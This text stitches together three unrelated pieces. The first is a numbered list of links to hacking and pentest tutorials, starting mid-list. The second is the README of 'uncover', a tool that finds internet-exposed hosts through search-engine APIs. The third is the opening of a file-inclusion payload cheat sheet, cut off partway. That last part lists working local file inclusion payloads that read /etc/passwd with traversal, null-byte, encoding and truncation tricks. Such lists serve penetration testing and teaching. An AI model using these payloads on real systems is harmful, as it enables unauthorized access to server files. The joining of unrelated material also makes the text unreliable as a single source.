https://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5 -1857-How I hacked into my neighbour’s WiFi and harvested login credentials?: https://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc -1858-What do Netcat, SMTP and self XSS have in common? Stored XSS: https://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002 -1859-1-Click Account Takeover in Virgool.io — a Nice Case Study: https://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2 -1860-Digging into Android Applications — Part 1 — Drozer + Burp: https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2 -1861-Linux for Pentester: APT Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation -1862-Linux for Pentester : ZIP Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation -1863-Koadic - COM Command & Control Framework: https://www.hackingarticles.in/koadic-com-command-control-framework -1864-Configure Sqlmap for WEB-GUI in Kali Linux : https://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux -1865-Penetration Testing: https://www.hackingarticles.in/Penetration-Testing -1866-Buffer Overflow Examples, Code execution by shellcode : https://0xrick.github.io/binary-exploitation/bof5 -1867-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution -1868-JSC Exploits: -https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html -1869-Injecting Into The Hunt: https://jsecurity101.com/2019/Injecting-Into-The-Hunt -1870-Bypassing Antivirus with Golang: https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it -1871-Windows Process Injection: Print Spooler: https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler -1872-Inject Shellcode Into Memory Using Unicorn : https://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn -1873-Macros and More with SharpShooter v2.0: https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0 -1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing -1875-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1876-Hacking a social media account and safeguarding it: https://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7 -1877-OTP Bypass on India’s Biggest Video Sharing Site: https://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -1879-Getting Root on macOS via 3rd Party Backup Software: https://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9 -1880-How to Enumerate MYSQL Database using Metasploit: https://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html -1881-Exploiting Insecure Firebase Database! https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty -1882-Penetration Testing - Complete Guide: https://softwaretestinghelp.com/penetration-testing-guide -1883-How To Upload A PHP Web Shell On WordPress Site: https://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site -1884-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1885-Ethical hacking: Lateral movement techniques: https://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques -1886-A Pivot Cheatsheet for Pentesters: http://nullsweep.com/pivot-cheatsheet-for-pentesters -1887-What to Look for When Reverse Engineering Android Apps: http://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps -1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth: http://crackitdown.com/2019/02/modlishka-kali-linux.html -1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ): www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets -1890-The Complete Hashcat Tutorial: https://ethicalhackingguru.com/the-complete-hashcat-tutorial -1891-Wireless Wifi Penetration Testing Hacker Notes: https://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes -1892-#BugBounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1893-Kerberoasting attack: https://en.hackndo.com/kerberoasting -1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs): https://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs -1895-Radare2 cutter tutorial: http://cousbox.com/axflw/radare2-cutter-tutorial.html -1896-Cracking Password Hashes with Hashcat: http://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat -1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417: http://blog.wpsec.com/csrf-to-rce-wordpress -1898-Best OSINT Tools: http://pcwdld.com/osint-tools-and-software -1899-Metasploit Exploitation Tool 2020: http://cybervie.com/blog/metasploit-exploitation-tool -1900-How to exploit CVE-2020-7961: https://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html -1901-PowerShell for Pentesters: https://varonis.com/blog/powershell-for-pentesters -1902-Android Pentest Tutorial: https://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html -1903-Burp Suite Tutorial: https://pentestgeek.com/web-applications/burp-suite-tutorial-1 -1904-Company Email Enumeration + Breached Email Finder: https://metalkey.github.io/company-email-enumeration--breached-email-finder.html -1905-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -1906-Active Directory Exploitation Cheat Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound -1907-Advanced Hacking Tutorials Collection: https://yeahhub.com/advanced-hacking-tutorials-collection -1908-Persistence – DLL Hijacking: https://pentestlab.blog/2020/03/04/persistence-dll-hijacking -1909-Brute force and dictionary attacks: A cheat sheet: https://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet -1910-How to use Facebook for Open Source Investigation: https://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint -1911-tcpdump Cheat Sheet: https://comparitech.com/net-admin/tcpdump-cheat-sheet -1912-Windows Post exploitation recon with Metasploit: https://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit -1913-Bug Hunting Methodology: https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066 -1914-Malware traffic analysis tutorial: https://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html -1915-Recon-ng v5 Tutorial: https://geekwire.eu/recon-ng-v5-tutorial -1916-Windows and Linux Privilege Escalation Tools: https://yeahhub.com/windows-linux-privilege-escalation-tools-2019 -1917-Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide -1918-Phishing Windows Credentials: https://pentestlab.blog/2020/03/02/phishing-windows-credentials -1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials: https://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials -1920-Recent Papers Related To Fuzzing: https://wcventure.github.io/FuzzingPaper -1921-Web Shells 101 Using PHP (Web Shells Part 2): https://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ -1922-Python3 reverse shell: https://polisediltrading.it/hai6jzbs/python3-reverse-shell.html -1923-Reverse Shell between two Linux machines: https://yeahhub.com/reverse-shell-linux-machines -1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit): https://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html -1925-How to Use Wireshark: Comprehensive Tutorial + Tips: https://varonis.com/blog/how-to-use-wireshark -1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation? https://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts -1927-Ethical hacking:Top privilege escalation techniques in Windows: https://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows -1928-How to Identify Company's Hacked Email Addresses: https://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html -1929-Android APK Reverse Engineering: What's in an APK: https://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk -1930-Keep Calm and HackTheBox - Beep: https://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/ -1931-Keep Calm and HackTheBox -Legacy: https://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/ -1932-Keep Calm and HackTheBox -Lame: https://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/ -1933-HacktheBox:Writeup Walkthrough: https://hackingarticles.in/hack-the-box-writeup-walkthrough -1934-2020 OSCP Exam Preparation: https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp -1935-My OSCP transformation: https://kevsec.fr/journey-to-oscp-2019-write-up -1936-A Detailed Guide on OSCP Preparation: https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/ -1937-Useful Commands and Tools - #OSCP: https://yeahhub.com/useful-commands-tools-oscp/ -1938-Comprehensive Guide on Password Spraying Attack https://hackingarticles.in/comprehensive-guide-on-password-spraying-attack -1939-Privilege Escalation: https://pentestlab.blog/category/privilege-escalation/ -1940-Red Team: https://pentestlab.blog/category/red-team/ -1941-Linux post-exploitation.Advancing from user to super-user in a few clicks https://hackmag.com/security/linux-killchain/ -1942--#BugBounty Cheatsheet https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html -1943--#Windows Notes/Cheatsheet https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html -1944-#Linux Notes/Cheatsheet https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html -1945-Windows Notes https://mad-coding.cn/tags/Windows/ -1946-#BlueTeam CheatSheet https://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d -1947-Linux Privilege Escalation Cheatsheet for OSCP: https://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html -1948-Shodan Pentesting Guide: https://community.turgensec.com/shodan-pentesting-guide -1949-Pentesters Guide to PostgreSQL Hacking: https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 -1950-Hacking-OSCP cheatsheet: https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/ -1951-A Comprehensive Guide to Breaking SSH: https://community.turgensec.com/ssh-hacking-guide -1952-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -1953-Best #firefox addons for #Hacking: https://twitter.com/cry__pto/status/1210836734331752449 -1954-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1955-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join: https://facebook.com/groups/AmmarAmerHacker -1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools: https://twitter.com/cry__pto/status/1270603017256124416 -1958-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1959-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1960-Website Mirroring Tools: https://twitter.com/cry__pto/status/1248640849812078593 -1961-automated credential discovery tools: https://twitter.com/cry__pto/status/1253214720372465665 -1962-Antiforensics Techniques: https://twitter.com/cry__pto/status/1215001674760294400 -1963-#bugbounty tools part (1): https://twitter.com/cry__pto/status/1212096231301881857 1964-Binary Analysis Frameworks: https://twitter.com/cry__pto/status/1207966421575184384 -1965-#BugBounty tools part (5): https://twitter.com/cry__pto/status/1214850754055458819 -1966-#BugBounty tools part (3): https://twitter.com/cry__pto/status/1212290510922158080 -1967-Kali Linux Commands List (Cheat Sheet): https://twitter.com/cry__pto/status/1264530546933272576 -1968-#BugBounty tools part (4): https://twitter.com/cry__pto/status/1212296173412851712 -1969--Automated enumeration tools: https://twitter.com/cry__pto/status/1214919232389099521 -1970-DNS lookup information Tools: https://twitter.com/cry__pto/status/1248639962746105863 -1971-OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1972-Social Engineering Tools: https://twitter.com/cry__pto/status/1180731438796333056 -1973-Hydra : https://twitter.com/cry__pto/status/1247507926807449600 -1974-#OSINT Your Full Guide: https://twitter.com/cry__pto/status/1244433669936349184 -1975-#BugBounty tools part (2): https://twitter.com/cry__pto/status/1212289852059860992 -1976-my own ebook library: https://twitter.com/cry__pto/status/1239308541468516354 -1977-Practice part (2): https://twitter.com/cry__pto/status/1213165695556567040 -1978-Practice part (3): https://twitter.com/cry__pto/status/1214220715337097222 -1979-my blog: https://twitter.com/cry__pto/status/1263457516672954368 -1980-Practice: https://twitter.com/cry__pto/status/1212341774569504769 -1981-how to search for XSS without proxy tool: https://twitter.com/cry__pto/status/1252558806837604352 -1982-How to collect email addresses from search engines: https://twitter.com/cry__pto/status/1058864931792138240 -1983-Hacking Tools Cheat Sheet: https://twitter.com/cry__pto/status/1255159507891687426 -1984-#OSCP Your Full Guide: https://twitter.com/cry__pto/status/1240842587927445504 -1985-#HackTheBox Your Full Guide: https://twitter.com/cry__pto/status/1241481478539816961 -1986-Web Scanners: https://twitter.com/cry__pto/status/1271826773009928194 -1987-HACKING MAGAZINES: -1-2600 — The Hacker Quarterly magazine:www.2600.com -2-Hackin9:http://hakin9.org -3-(IN)SECURE magazine:https://lnkd.in/grNM2t8 -4-PHRACK:www.phrack.org/archives -5-Hacker’s Manual 2019 -1988-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1989-Kali Linux Cheat Sheet for Hackers: https://twitter.com/cry__pto/status/1272792311236263937 -1990-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1992-100 Best Hacking Tools for Security Professionals in 2020: https://gbhackers.com/hacking-tools-list/ -1993-SNMP Enumeration: OpUtils:www.manageengine.com SNMP Informant:www.snmp-informant.com SNMP Scanner:www.secure-bytes.com SNMPUtil:www.wtcs.org SolarWinds:www.solarwinds.com -1994-INFO-SEC RELATED CHEAT SHEETS: https://twitter.com/cry__pto/status/1274768435361337346 -1995-METASPLOIT CHEAT SHEET: https://twitter.com/cry__pto/status/1274769179548278786 -1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus: https://twitter.com/cry__pto/status/1275359087304286210 -1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More: https://twitter.com/cry__pto/status/1276391703906222080 -1998-learn penetration testing a great series as PDF: https://twitter.com/cry__pto/status/1277588369426526209 -1999-Detecting secrets in code committed to Gitlab (in real time): https://www.youtube.com/watch?v=eCDgUvXZ_YE -2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants: https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html -2001-Building Virtual Machine Labs: https://github.com/da667/Building_Virtual_Machine_Labs-Live_Training -2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]: https://kakyouim.hatenablog.com/entry/2020/05/27/010807 -2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools): https://softwaretestinghelp.com/penetration-testing-tools/
<h1 align="center"> <img src="https://user-images.githubusercontent.com/8293321/211795814-5dc72ad0-9539-4bf5-af5a-f806025e1bda.png" width="200px"> <br> </h1> <h4 align="center">Quickly discover exposed hosts on the internet using multiple search engines.</h4> <p align="center"> <img src="https://img.shields.io/github/go-mod/go-version/projectdiscovery/uncover"> <a href="https://github.com/projectdiscovery/uncover/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a> <a href="https://github.com/projectdiscovery/uncover/releases"><img src="https://img.shields.io/github/release/projectdiscovery/uncover"></a> <a href="https://twitter.com/pdiscoveryio"><img src="https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter"></a> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> </p> <p align="center"> <a href="#features">Features</a> • <a href="#installation-instructions">Installation</a> • <a href="#usage">Usage</a> • <a href="#provider-configuration">Configuration</a> • <a href="#running-uncover">Running Uncover</a> • <a href="https://discord.gg/projectdiscovery">Join Discord</a> </p> --- **uncover** is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools. # Features <h1 align="center"> <img src="https://user-images.githubusercontent.com/8293321/156347215-a9ed00c2-4161-4773-9372-29fc32200f6a.png" alt="httpx" width="700px"></a> <br> </h1> - Query multiple search engine at once - Available Search engine support - **[Shodan](https://www.shodan.io)** - **[Censys](https://search.censys.io)** - **[FOFA](https://fofa.info)** - **[Hunter](https://hunter.qianxin.com)** - **[Quake](https://quake.360.net/quake/#/index)** - **[Zoomeye](https://www.zoomeye.org)** - **[Netlas](https://netlas.io/)** - **[CriminalIP](https://www.criminalip.io)** - Multiple API key input support - Automatic API key randomization - **stdin** / **stdout** support for input ## Installation Instructions uncover requires **go1.17** to install successfully. Run the following command to get the repo - ```sh go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest ``` ## Usage ```sh uncover -h ``` This will display help for the tool. Here are all the flags it supports: ```console Usage: ./uncover [flags] Flags: INPUT: -q, -query string[] search query, supports: stdin,file,config input (example: -q 'example query', -q 'query.txt') -e, -engine string[] search engine to query (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip) (default shodan) SEARCH-ENGINE: -s, -shodan string[] search query for shodan (example: -shodan 'query.txt') -sd, -shodan-idb string[] search query for shodan-idb (example: -shodan-idb 'query.txt') -ff, -fofa string[] search query for fofa (example: -fofa 'query.txt') -cs, -censys string[] search query for censys (example: -censys 'query.txt') -qk, -quake string[] search query for quake (example: -quake 'query.txt') -ht, -hunter string[] search query for hunter (example: -hunter 'query.txt') -ze, -zoomeye string[] search query for zoomeye (example: -zoomeye 'query.txt') -ne, -netlas string[] search query for netlas (example: -netlas 'query.txt') -cl, -criminalip string[] search query for criminalip (example: -criminalip 'query.txt') CONFIG: -pc, -provider string provider configuration file (default "$HOME/.config/uncover/provider-config.yaml") -config string flag configuration file (default "$HOME/.config/uncover/config.yaml") -timeout int timeout in seconds (default 30) -delay int delay between requests in seconds (0 to disable) (default 1) -retry int number of times to retry a failed request (default 2) OUTPUT: -o, -output string output file to write found results -f, -field string field to display in output (ip,port,host) (default "ip:port") -j, -json write output in JSONL(ines) format -r, -raw write raw output as received by the remote api -l, -limit int limit the number of results to return (default 100) -nc, -no-color disable colors in output DEBUG: -silent show only results in output -version show version of the project -v show verbose output ``` ## Provider Configuration The default provider configuration file should be located at `$HOME/.config/uncover/provider-config.yaml` and has the following contents as an example. > **Note**: API keys are required needs to be configured before running uncover. ```yaml shodan: - SHODAN_API_KEY_1 - SHODAN_API_KEY_2 censys: - CENSYS_API_ID_1:CENSYS_API_SECRET_1 - CENSYS_API_ID_2:CENSYS_API_SECRET_2 fofa: - FOFA_EMAIL_1:FOFA_KEY_2 - FOFA_EMAIL_2:FOFA_KEY_2 quake: - QUAKE_TOKEN_1 - QUAKE_TOKEN_2 hunter: - HUNTER_API_KEY_1 - HUNTER_API_KEY_2 zoomeye: - ZOOMEYE_API_KEY_1 - ZOOMEYE_API_KEY_2 netlas: - NETLAS_API_KEY_1 - NETLAS_API_KEY_2 criminalip: - CRIMINALIP_API_KEY_1 - CRIMINALIP_API_KEY_2 ``` When multiple keys/credentials are specified for same provider in the config file, random key will be used for each execution. alternatively you can also set the API key as environment variable in your bash profile. ```yaml export SHODAN_API_KEY=xxx export CENSYS_API_ID=xxx export CENSYS_API_SECRET=xxx export FOFA_EMAIL=xxx export FOFA_KEY=xxx export QUAKE_TOKEN=xxx export HUNTER_API_KEY=xxx export ZOOMEYE_API_KEY=xxx export NETLAS_API_KEY=xxx export CRIMINALIP_API_KEY=xxx ``` Required API keys can be obtained by signing up on following platform [Shodan](https://account.shodan.io/register), [Censys](https://censys.io/register), [Fofa](https://fofa.info/toLogin), [Quake](https://quake.360.net/quake/#/index), [Hunter](https://user.skyeye.qianxin.com/user/register?next=https%3A//hunter.qianxin.com/api/uLogin&fromLogin=1), [ZoomEye](https://www.zoomeye.org/login), [Netlas](https://app.netlas.io/registration/) and [CriminalIP](https://www.criminalip.io/register). ## Running Uncover ### Default run: **uncover** supports multiple ways to make the query including **stdin** or `q` flag, as default `shodan` engine is used for search if no engine is specified. ```console echo 'ssl:"Uber Technologies, Inc."' | uncover __ ______ _________ _ _____ _____ / / / / __ \/ ___/ __ \ | / / _ \/ ___/ / /_/ / / / / /__/ /_/ / |/ / __/ / \__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. [WRN] By using uncover, you also agree to the terms of the APIs used. 107.180.12.116:993 107.180.26.155:443 104.244.99.31:443 161.28.20.79:443 104.21.8.108:443 198.71.233.203:443 104.17.237.13:443 162.255.165.171:443 12.237.119.61:443 192.169.250.211:443 104.16.251.50:443 ``` Running **uncover** with **file** input containing multiple search queries per line. ```console cat dorks.txt ssl:"Uber Technologies, Inc." title:"Grafana" ``` ```console uncover -q dorks.txt __ ______ _________ _ _____ _____ / / / / __ \/ ___/ __ \ | / / _ \/ ___/ / /_/ / / / / /__/ /_/ / |/ / __/ / \__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. [WRN] By using uncover, you also agree to the terms of the APIs used. 107.180.12.116:993 107.180.26.155:443 104.244.99.31:443 161.28.20.79:443 104.21.8.108:443 198.71.233.203:443 2607:7c80:54:3::74:3001 104.198.55.35:80 46.101.82.244:3000 34.147.126.112:80 138.197.147.213:8086 ``` ### Single query against multiple search engine **uncover** supports multiple search engine, as default **shodan** is used, `-e` flag can be used to run same query against any or all search engines. ```console echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip __ ______ _________ _ _____ _____ / / / / __ \/ ___/ __ \ | / / _ \/ ___/ / /_/ / / / / /__/ /_/ / |/ / __/ / \__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. [WRN] By using uncover, you also agree to the terms of the APIs used. 176.31.249.189:5001 13.211.116.80:443 43.130.1.221:631 192.195.70.29:443 52.27.22.181:443 117.48.120.226:8889 106.52.115.145:49153 13.69.135.128:443 193.35.99.158:443 18.202.109.218:8089 101.36.105.97:21379 42.194.226.30:2626 ``` ### Multiple query against multiple search engine ```console uncover -shodan 'http.component:"Atlassian Jira"' -censys 'services.software.product=`Jira`' -fofa 'app="ATLASSIAN-JIRA"' -quake 'Jira' -hunter 'Jira' -zoomeye 'app:"Atlassian JIRA"' -netlas 'jira' -criminalip 'Jira' __ ______ _________ _ _____ _____ / / / / __ \/ ___/ __ \ | / / _ \/ ___/ / /_/ / / / / /__/ /_/ / |/ / __/ / \__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. [WRN] By using uncover, you also agree to the terms of the APIs used. 104.68.37.129:443 162.222.160.42:443 34.255.84.133:443 52.204.121.166:443 23.198.29.120:443 136.156.180.95:443 54.194.233.15:443 104.117.55.155:443 149.81.4.6:443 54.255.218.95:443 3.223.137.57:443 83.228.124.171:443 23.202.195.82:443 52.16.59.25:443 18.159.145.227:443 104.105.53.236:443 ``` ### Shodan-InternetDB API **uncover** supports [shodan-internetdb](https://internetdb.shodan.io) API to pull available ports for given IP/CIDR input. `shodan-idb` used as **default** engine when **IP/CIDR** is provided as input, otherwise `shodan` search engine is used. ```console echo 51.83.59.99/24 | uncover __ ______ _________ _ _____ _____ / / / / __ \/ ___/ __ \ | / / _ \/ ___/ / /_/ / / / / /__/ /_/ / |/ / __/ / \__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. [WRN] By using uncover, you also agree to the terms of the APIs used. 51.83.59.1:53 51.83.59.1:10000 51.83.59.2:53 51.83.59.3:25 51.83.59.3:80 51.83.59.3:389 51.83.59.3:443 51.83.59.3:465 51.83.59.3:587 51.83.59.3:993 ``` ### Field Format `-f, -field` flag can be used to indicate which fields to return, currently, `ip`, `port`, and `host` are supported and can be used to return desired fields. ```console uncover -q jira -f host -silent ec2-44-198-22-253.compute-1.amazonaws.com ec2-18-246-31-139.us-west-2.compute.amazonaws.com tasks.devrtb.com leased-line-91-149-128-229.telecom.by 74.242.203.213.static.inetbone.net ec2-52-211-7-108.eu-west-1.compute.amazonaws.com ec2-54-187-161-180.us-west-2.compute.amazonaws.com 185-2-52-226.static.nucleus.be ec2-34-241-80-255.eu-west-1.compute.amazonaws.com ``` ### Field Formatting **uncover** has a `-f, -field` flag that can be used to customize the output format. For example, in the case of `uncover -f https://ip:port/version`, ip:port will be replaced with results in the output while keeping the format defined, It can also be used to specify a known scheme/path/file in order to prepare the output so that it can be immediately passed as input to other tools in the pipeline. ```console echo kubernetes | uncover -f https://ip:port/version -silent https://35.222.229.38:443/version https://52.11.181.228:443/version https://35.239.255.1:443/version https://34.71.48.11:443/version https://130.211.54.173:443/version https://54.184.250.232:443/version ``` Output of **uncover** can be further piped to other projects in workflow accepting **stdin** as input, for example: - `uncover -q example -f ip | naabu` - Runs [naabu](https://github.com/projectdiscovery/naabu) for port scanning on the found host. - `uncover -q title:GitLab | httpx` - Runs [httpx](https://github.com/projectdiscovery/httpx) for web server probing the found result. - `uncover -q 51.83.59.99/24 | httpx` - Runs [httpx](https://github.com/projectdiscovery/naabu) on host/ports obtained from shodan-internetdb. ```console uncover -q http.title:GitLab -silent | httpx -silent https://15.185.150.109 https://139.162.137.16 https://164.68.115.243 https://135.125.215.186 https://163.172.59.119 http://15.236.10.197 https://129.206.117.248 ``` - `uncover -q 'org:"Example Inc."' | httpx | nuclei` - Runs [httpx](https://github.com/projectdiscovery/httpx) / [nuclei](https://github.com/projectdiscovery/nuclei) for vulnerability assessment. ![image](https://user-images.githubusercontent.com/8293321/156753063-86ea4c5d-92ad-4c24-a7af-871c12aa278c.png) ## Notes: - **keys/ credentials** are required to configure before running or using this project. - `query` flag supports **all and only filters supported by search engine.** - results are limited to `100` as default and can be increased with `limit` flag. - `shodan-idb` API doesn't requires an API key and works out of the box. - `shodan-idb` API is used as **default** engine when **IP/CIDR** is provided as input. ----- <div align="center"> **uncover** is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team. </div>
# File Inclusion > The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application ## Summary * [Tools](#tools) * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) * [UTF-8 encoding](#utf-8-encoding) * [Path and dot truncation](#path-and-dot-truncation) * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) * [Wrapper php://filter](#wrapper-phpfilter) * [Wrapper zip://](#wrapper-zip) * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect) * [Wrapper input://](#wrapper-input) * [Wrapper phar://](#wrapper-phar) * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) * [LFI to RCE via upload](#lfi-to-rce-via-upload) * [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race) * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) * [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) ## Tools * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) * [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) * [panoptic - https://github.com/lightos/Panoptic](https://github.com/lightos/Panoptic) ## Basic LFI In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. ```powershell http://example.com/index.php?page=../../../etc/passwd ``` ### Null byte :warning: In versions of PHP below 5.3.4 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` ### UTF-8 encoding ```powershell http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 ``` ### Path and dot truncation On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 